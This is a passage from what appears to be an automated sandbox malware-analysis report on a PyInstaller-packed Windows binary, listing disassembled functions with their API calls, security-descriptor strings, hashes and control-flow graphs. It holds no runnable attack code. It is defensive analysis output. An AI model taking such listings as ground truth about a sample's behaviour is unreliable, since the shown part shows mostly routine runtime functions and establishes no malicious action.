                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                  • Instruction ID: 1fb64c4265ef5c98442378a9dd6faad2a8efac5e9508605bdbec03dfb8d90cd3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDC1162290C687D1E762AB1198402BDBBB2FBE1BA0FE54138DA4D07791CF7CE4459F60
                                                                                                                                                                                                                                  Function 00007FF72C658570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                                                                  • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                  • Instruction ID: 4e9efa4256274eaa79a19353c0f60a9e941a94e07aa51b5e515e7b0f6c095f0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7212521A0C64241EB51AB55B94423AE3A2FFD57F4FA00235E66D43AD4DE7CD4458F10
                                                                                                                                                                                                                                  Function 00007FF72C6590E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetCurrentProcess.KERNEL32 ref: 00007FF72C658590
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: OpenProcessToken.ADVAPI32 ref: 00007FF72C6585A3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetTokenInformation.KERNELBASE ref: 00007FF72C6585C8
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetLastError.KERNEL32 ref: 00007FF72C6585D2
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetTokenInformation.KERNELBASE ref: 00007FF72C658612
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72C65862E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: CloseHandle.KERNEL32 ref: 00007FF72C658646
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C65916C
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C659175
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                  • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction ID: 430de809b3fb511dda6bfa2792f7ff47d410db63dc1c24250cec4923645aa75c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4214F21A0874291E612BB10EC153EAA362FFA8790FE44435EA4D53BD6DF3CD805CB60
                                                                                                                                                                                                                                  Function 00007FF72C66CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 965 7ff72c66cf60-7ff72c66cf85 966 7ff72c66cf8b-7ff72c66cf8e 965->966 967 7ff72c66d253 965->967 969 7ff72c66cfc7-7ff72c66cff3 966->969 970 7ff72c66cf90-7ff72c66cfc2 call 7ff72c66a814 966->970 968 7ff72c66d255-7ff72c66d265 967->968 971 7ff72c66cffe-7ff72c66d004 969->971 972 7ff72c66cff5-7ff72c66cffc 969->972 970->968 974 7ff72c66d006-7ff72c66d00f call 7ff72c66c320 971->974 975 7ff72c66d014-7ff72c66d029 call 7ff72c67391c 971->975 972->970 972->971 974->975 980 7ff72c66d143-7ff72c66d14c 975->980 981 7ff72c66d02f-7ff72c66d038 975->981 982 7ff72c66d14e-7ff72c66d154 980->982 983 7ff72c66d1a0-7ff72c66d1c5 WriteFile 980->983 981->980 984 7ff72c66d03e-7ff72c66d042 981->984 987 7ff72c66d18c-7ff72c66d19e call 7ff72c66ca18 982->987 988 7ff72c66d156-7ff72c66d159 982->988 985 7ff72c66d1c7-7ff72c66d1cd GetLastError 983->985 986 7ff72c66d1d0 983->986 989 7ff72c66d053-7ff72c66d05e 984->989 990 7ff72c66d044-7ff72c66d04c call 7ff72c6647c0 984->990 985->986 991 7ff72c66d1d3 986->991 1008 7ff72c66d130-7ff72c66d137 987->1008 992 7ff72c66d15b-7ff72c66d15e 988->992 993 7ff72c66d178-7ff72c66d18a call 7ff72c66cc38 988->993 995 7ff72c66d06f-7ff72c66d084 GetConsoleMode 989->995 996 7ff72c66d060-7ff72c66d069 989->996 990->989 999 7ff72c66d1d8 991->999 1000 7ff72c66d1e4-7ff72c66d1ee 992->1000 1001 7ff72c66d164-7ff72c66d176 call 7ff72c66cb1c 992->1001 993->1008 1004 7ff72c66d13c 995->1004 1005 7ff72c66d08a-7ff72c66d090 995->1005 996->980 996->995 1009 7ff72c66d1dd 999->1009 1010 7ff72c66d24c-7ff72c66d251 1000->1010 1011 7ff72c66d1f0-7ff72c66d1f5 1000->1011 1001->1008 1004->980 1006 7ff72c66d119-7ff72c66d12b call 7ff72c66c5a0 1005->1006 1007 7ff72c66d096-7ff72c66d099 1005->1007 1006->1008 1015 7ff72c66d09b-7ff72c66d09e 1007->1015 1016 7ff72c66d0a4-7ff72c66d0b2 1007->1016 1008->999 1009->1000 1010->968 1017 7ff72c66d1f7-7ff72c66d1fa 1011->1017 1018 7ff72c66d223-7ff72c66d22d 1011->1018 1015->1009 1015->1016 1022 7ff72c66d0b4 1016->1022 1023 7ff72c66d110-7ff72c66d114 1016->1023 1024 7ff72c66d1fc-7ff72c66d20b 1017->1024 1025 7ff72c66d213-7ff72c66d21e call 7ff72c664ec4 1017->1025 1020 7ff72c66d234-7ff72c66d243 1018->1020 1021 7ff72c66d22f-7ff72c66d232 1018->1021 1020->1010 1021->967 1021->1020 1026 7ff72c66d0b8-7ff72c66d0cf call 7ff72c6739e8 1022->1026 1023->991 1024->1025 1025->1018 1031 7ff72c66d107-7ff72c66d10d GetLastError 1026->1031 1032 7ff72c66d0d1-7ff72c66d0dd 1026->1032 1031->1023 1033 7ff72c66d0fc-7ff72c66d103 1032->1033 1034 7ff72c66d0df-7ff72c66d0f1 call 7ff72c6739e8 1032->1034 1033->1023 1036 7ff72c66d105 1033->1036 1034->1031 1038 7ff72c66d0f3-7ff72c66d0fa 1034->1038 1036->1026 1038->1033
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D07C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D107
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                  • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction ID: dad23c8e41addc558e5eaa13b3d2361447927d0d7230b50109a2f48c02d4c527
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0791D632E1865195F752AF669C4027DBBB2FB647A8FA4413DDE0E53684CE3CD442CB20
                                                                                                                                                                                                                                  Function 00007FF72C665628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                                                                  • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                  • Instruction ID: c6b58e72bd74b63d40caca36ecf0d3e284f8668a89b904be69434ffa4d3f7fcd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C341A462D1878283E711AB209911379B671FBA4774F609339E79C43AD5DF7CA0E08B50
                                                                                                                                                                                                                                  Function 00007FF72C65CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                                                                                  • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                  • Instruction ID: 6e30d9ec16d69f3e57071b0ca5c78008316a9556d923d944832d7baf699061e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66313B20E0894351FA16BB659D223B9A693FFB53E4FE45538DB0D472D7DE2CA404CA30
                                                                                                                                                                                                                                  Function 00007FF72C669A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                  • Instruction ID: 8cb72e42a88260e657941455c56dc945eeb9e11eab43b4414d31d160ea84eed6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3D06720B0874652EA1A3B715C5A178A2A7FFA8731BA4183CCC0A06393DD2CA84D8A20
                                                                                                                                                                                                                                  Function 00007FF72C66013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                  • Instruction ID: e729ccd8e8d10f86d6f780a2c21e2924e2a28b74ba22fc5a9621f802ae7e9ed1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF51EB21B0924286E726B9659C0067AF5A2FF54BB4FA84638DE6D037C5CE3CE4018E64
                                                                                                                                                                                                                                  Function 00007FF72C66C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                  • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                  • Instruction ID: 2543a96461a1dba0fe938641a66756ce545f6c037bca7570d7cb3361ced89ee7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03119072608E8281DA21AB26AC14169F763FB95BF4FA44335EA7D0B7D9CE3CD0518B10
                                                                                                                                                                                                                                  Function 00007FF72C66A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                                  • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                  • Instruction ID: 8e55812d8af6b0e18ed7b78169a6367a69c14bc98dbbdadb1cdcecf412e5f4b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16E04F10E5920242FE07BBB16C55178A262FFE4B20FE44538C90E422A2EE2C68858A30
                                                                                                                                                                                                                                  Function 00007FF72C66AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABC6
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                                                  • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                  • Instruction ID: ff124b5c4a0a30bc84c456b381c3c23e6591b99b348b6acf705da7a27a7e4cef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8021C511B0864201EA5277719C9027DF6A3FFA47B0FA8423DD92E477C2CF6CE4814B20
                                                                                                                                                                                                                                  Function 00007FF72C66BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
